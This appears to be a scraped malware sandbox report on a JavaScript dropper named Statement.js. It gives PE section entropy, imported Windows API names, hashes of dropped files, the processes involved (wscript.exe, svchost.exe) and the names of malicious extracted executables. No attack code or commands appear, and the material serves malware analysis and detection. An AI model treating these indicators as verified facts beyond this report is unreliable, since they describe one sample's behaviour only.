Name .data Entropy 0.873135565039 Virtual Address 0x1d000 Virtual Size 0x168c Raw Size 0x1000 MD5 142fbeeb64879b0279bd0d2af59aa838	.data	0.873135565039	0x1d000	0x168c	0x1000	142fbeeb64879b0279bd0d2af59aa838
Name .idata Entropy 7.09986250074 Virtual Address 0x1f000 Virtual Size 0x1c511 Raw Size 0x1d000 MD5 93659f3084eb73e7068366a444b4eb3f	.idata	7.09986250074	0x1f000	0x1c511	0x1d000	93659f3084eb73e7068366a444b4eb3f
Name .reloc Entropy 0.659608529183 Virtual Address 0x3c000 Virtual Size 0x3d8 Raw Size 0x1000 MD5 0d528fdbb6156b332c47852d58ec516b	.reloc	0.659608529183	0x3c000	0x3d8	0x1000	0d528fdbb6156b332c47852d58ec516b

File Imports

ChooseColorW

FindTextW

ImmInstallIMEA

FindNextVolumeMountPointA

GetBinaryTypeA

GetLastError

GetWindowsDirectoryA

GlobalSize

HeapAlloc

lstrcatA

MultiByteToWideChar

WritePrivateProfileStructA

DsFreeSchemaGuidMapA

DsFreeSpnArrayW

CoFreeLibrary

SetupDiDestroyDriverInfoList

SetupDiGetActualSectionToInstallA

SetupGetLineByIndexA

StrCmpNIA

CoInternetCreateZoneManager

ReleaseBindInfo

SendMessageW

Informative 5
- 34DA60AA966CD9270C5362E6AEF824CF
  
  Overview Download Disabled Hash Seen Before
  
  Size
  1.5KiB (1548 bytes)
  
  Type
  data
  
  Runtime Process
  svchost.exe (PID: 3616)
  
  MD5
  
  83e10465b722ef33ff0b6f535e8d996b
  
  SHA1
  
  339cdd57cfd5b141169b615ff31428782d1da639
  
  SHA256
  
  02ab57e4e67a0cb48dd2ff34830e8ac40f4476fb08ca6be3f5cd846f646840f0
- 40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1
  
  Download Disabled Hash Seen Before
  
  Size
  2.9KiB (2920 bytes)
  
  Type
  data
  
  Runtime Process
  wscript.exe (PID: 2576)
  
  MD5
  
  86f44a880650cc1e8a5c1dfb42ac0566
  
  SHA1
  
  dc5ec1f4928b80e3407cdeef1c4b8c1b1539a374
  
  SHA256
  
  155ffafc01ab9ab1366d6946e71ffc9a95d049d5fd087608a80d0b14a0d066f8
- 74FBF93595CFC8459196065CE54AD928
  
  Overview Download Disabled Hash Seen Before
  
  Size
  1.4KiB (1400 bytes)
  
  Type
  data
  
  Runtime Process
  svchost.exe (PID: 3616)
  
  MD5
  
  1edaf9ae99ce2920667d0e9a8b3f8c9c
  
  SHA1
  
  f5ad0bcc1ad56cd150725b1c866c30ad92ef21b0
  
  SHA256
  
  4f32d5dc00f715250abcc486511e37f501a899deb3bf7ea8adbbd3aef1c412da
- Cab6293.tmp
  
  Overview Download Disabled Hash Seen Before
  
  Size
  50KiB (50939 bytes)
  
  Type
  data
  
  Description
  Microsoft Cabinet archive data, 50939 bytes, 1 file
  
  Runtime Process
  wscript.exe (PID: 2576)
  
  MD5
  
  41f958d2d3e9ed4504b6a8863fd72b49
  
  SHA1
  
  f6d380b256b0e66ef347adc78195fd0f228b3e33
  
  SHA256
  
  c929701c67a05f90827563eedccf5eba8e65b2da970189a0371f28cd896708b8
- Tar629E.tmp
  
  Overview Download Disabled Hash Seen Before
  
  Size
  118KiB (120573 bytes)
  
  Type
  data
  
  Runtime Process
  wscript.exe (PID: 2576)
  
  MD5
  
  179d2951034116b184198e0bf26daa47
  
  SHA1
  
  b76bf79e7fa15491075c3bd9ec569e1c8540174b
  
  SHA256
  
  7e58975a4e1e86940f84e744709426939b85ae174dbbf020da3c893a54fd1da2

Statement.js

Incident Response

Risk Assessment

Additional Context

Related Sandbox Artifacts

Indicators

Malicious Indicators 10

Suspicious Indicators 9

Informative 27

File Details

Statement.js

Resources

Visualization

Screenshots

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Suricata Alerts

Extracted Strings

Extracted Files

Malicious 2

download[1].aspx

goJnUL86e.exe

Informative 5

34DA60AA966CD9270C5362E6AEF824CF

40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1

74FBF93595CFC8459196065CE54AD928

Cab6293.tmp

Tar629E.tmp

Notifications

Runtime

Community

Statement.js

Incident Response

Risk Assessment

Additional Context

Related Sandbox Artifacts

Indicators

Malicious Indicators 10

Suspicious Indicators 9

Informative 27

File Details

Statement.js

Resources

Visualization

Screenshots

System Resource Monitor

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Suricata Alerts

Extracted Strings

Extracted Files

Malicious 2

download[1].aspx

goJnUL86e.exe

Informative 5

34DA60AA966CD9270C5362E6AEF824CF

40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1

74FBF93595CFC8459196065CE54AD928

Cab6293.tmp

Tar629E.tmp

Notifications

Runtime

Community

Latest News

Vetting required

Request Report Deletion

Link